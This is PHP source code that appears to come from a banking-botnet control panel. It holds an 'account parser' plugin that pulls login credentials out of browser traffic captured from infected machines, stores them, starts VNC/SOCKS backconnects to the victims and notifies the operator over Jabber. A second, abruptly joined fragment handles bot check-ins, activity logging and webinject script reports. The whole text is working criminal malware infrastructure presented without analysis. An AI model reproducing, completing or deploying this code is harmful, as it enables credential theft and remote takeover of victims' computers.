/** Parse accounts * 0. Only BLT_HTTP_REQUEST & BLT_HTTPS_REQUEST against $list[SBCID_BOTLOG_TYPE] * 1. If Match URL masks against $list[SBCID_PATH_SOURCE] * 2. If Match params mask against $list[SBCID_BOTLOG] * 3. Store into the DB (no dups) * 4. Autoconnect VNC|SOCKS when set * 5. Jabber-notify if configured */ function accparseplugin_parselog($list, $botId) { /* Only for HTTP[S] */ $type = toInt($list[SBCID_BOTLOG_TYPE]); if ($type != BLT_HTTP_REQUEST && $type != BLT_HTTPS_REQUEST) { return; } /* Match the URL */ $matched_rule = null; $R = mysql_query('SELECT * FROM `accparse_rules` WHERE `enabled`=1 ORDER BY NULL;'); while ($R && !is_bool($r = mysql_fetch_assoc($R))) { $wildcart = '~^' . str_replace('\\*', '.*', preg_quote(trim($r['url']), '~')) . '$~i'; if (preg_match($wildcart, $list[SBCID_PATH_SOURCE])) { $matched_rule = $r; mysql_free_result($R); break; } } if (is_null($matched_rule)) { return; } GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule matched: ' . $matched_rule['alias']); /* Match the params */ $matched_params = array(); foreach (explode("\n", $matched_rule['params']) as $param) { $param = rtrim(trim($param), '='); $wildcart = '~^(' . str_replace('\\*', '.*', preg_quote($param, '~')) . ')=(.+)$~ium'; if (preg_match_all($wildcart, $list[SBCID_BOTLOG], $matches, PREG_SET_ORDER)) { foreach ($matches as $m) { $matched_params[urldecode($m[1])] = urldecode($m[2]); } } } if (count($matched_params) == 0) { return; } GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule params also matched: ' . count($matched_params)); /* String-format */ $matched_account = ''; asort($matched_params); foreach ($matched_params as $k => $v) { $matched_account .= "{$k}={$v}\n"; } /* Store */ $q_botId = mysql_real_escape_string($botId); $q_bot_info = mysql_real_escape_string(implode("\n", array(basename($list[SBCID_PROCESS_NAME])))); $q_ruleid = $matched_rule['id']; $q_account = mysql_real_escape_string($matched_account); $q_acc_hash = md5(implode($matched_params)); $q_mtime = time(); mysql_query("INSERT INTO `accparse_accounts` VALUES(NULL, '{$q_botId}', '{$q_bot_info}', {$q_ruleid}, '{$q_account}', '{$q_acc_hash}', {$q_mtime}, 0, '') ON DUPLICATE KEY UPDATE `mtime`={$q_mtime};"); /* Dupecheck */ $affected = mysql_affected_rows(); $duplicate_account = $affected == 2; # INSERT gives 1, UPDATE gives 2. This magic should work :) GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account ' . ($duplicate_account ? 'updated' : 'added')); /* Autoconnect option */ if ($matched_rule['autoconnect']) { if (function_exists('vncplugin_autoconnect')) { $q_protocol = $matched_rule['autoconnect']; GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account backconnect: protocol=' . $q_protocol); mysql_query("INSERT INTO `vnc_bot_connections` VALUES('{$q_botId}', {$q_protocol}, 1, 0, 0, 0) ON DUPLICATE KEY UPDATE `protocol`={$q_protocol}, `ctime`=0, `do_connect`=IF(`do_connect`=0,1,`do_connect`);"); vncplugin_autoconnect($botId); } } /* Notify */ if ($duplicate_account) { return; } # do nothing else if ($matched_rule['notify'] && !empty($GLOBALS['config']['accparse_jid'])) { $message = sprintf("Account-Parser match: %s (URL: %s)\n", $matched_rule['alias'], $matched_rule['url']); $message .= sprintf("BotID: %s\n", $botId); $message .= sprintf("Browser: %s\n", $list[SBCID_PROCESS_NAME]); $message .= sprintf("URL: %s\n", $list[SBCID_PATH_SOURCE]); $message .= "\n"; $message .= strlen($matched_account) > 100 ? substr($matched_account, 0, 100) . "\n...(see in the admin)" : $matched_account; GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Jabber notify: ' . $GLOBALS['config']['accparse_jid']); jabber_notify($GLOBALS['config']['accparse_jid'], $message); } }
gate_die('init', 'Incorrect login key'); } /////////////////////////////////////////////////////////////////////////////////////////////////// // Обрабатываем данные. /////////////////////////////////////////////////////////////////////////////////////////////////// $botId = str_replace("", "", trim($list[SBCID_BOT_ID])); $botIdQ = addslashes($botId); $botnet = empty($list[SBCID_BOTNET]) ? DEFAULT_BOTNET : str_replace("", "", trim($list[SBCID_BOTNET])); $botnetQ = addslashes($botnet); $botVersion = toUint($list[SBCID_BOT_VERSION]); $countryQ = $country; $curTime = time(); GATE_DEBUG_MODE && GateLog::get()->log(GateLog::L_DEBUG, 'init', "Incoming: {$botnet}/{$botId}, v=" . intToVersion($botVersion) . ", IP={$realIpv4}, country={$country} (" . ($country_allowed ? 'allowed' : 'COUNTRY BANNED') . ")"); /* plugin: vnc */ if (function_exists('vncplugin_autoconnect')) { vncplugin_autoconnect($botId); } /* Activity */ $dateQ = date('Y-m-d'); $is_script = (int) (!empty($list[SBCID_SCRIPT_ID])); $is_report = (int) (!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE])); $is_presence = (int) (!empty($list[SBCID_NET_LATENCY])); GATE_DEBUG_MODE && GateLog::get()->log(GateLog::L_TRACE, 'history', "Date {$dateQ}: is_script={$is_script}, is_report={$is_report}, is_presence={$is_presence}"); mysql_query("INSERT INTO `botnet_activity` VALUES('{$botIdQ}', '{$dateQ}', {$curTime}, {$curTime}, {$is_script}, {$is_report}, {$is_presence})\n\t ON DUPLICATE KEY UPDATE\n\t `rtime_last` = {$curTime},\n\t `c_scripts` = `c_scripts` + {$is_script},\n\t `c_reports` = `c_reports` + {$is_report},\n\t `c_presence` = `c_presence` + {$is_presence}\n\t ;\n\t"); //Отчет об исполнении скрипта. if (!empty($list[SBCID_SCRIPT_ID]) && isset($list[SBCID_SCRIPT_STATUS], $list[SBCID_SCRIPT_RESULT]) && strlen($list[SBCID_SCRIPT_ID]) == 16) { $report_handled = false; $report_success = toInt($list[SBCID_SCRIPT_STATUS]) == 0; GATE_DEBUG_MODE && GateLog::get()->log(GateLog::L_TRACE, 'type.script', "Script report: sucess={$report_success}, report=" . $list[SBCID_SCRIPT_RESULT]); /* plugin: webinjects */ if (function_exists('gate_plugin_webinjects_onscript')) {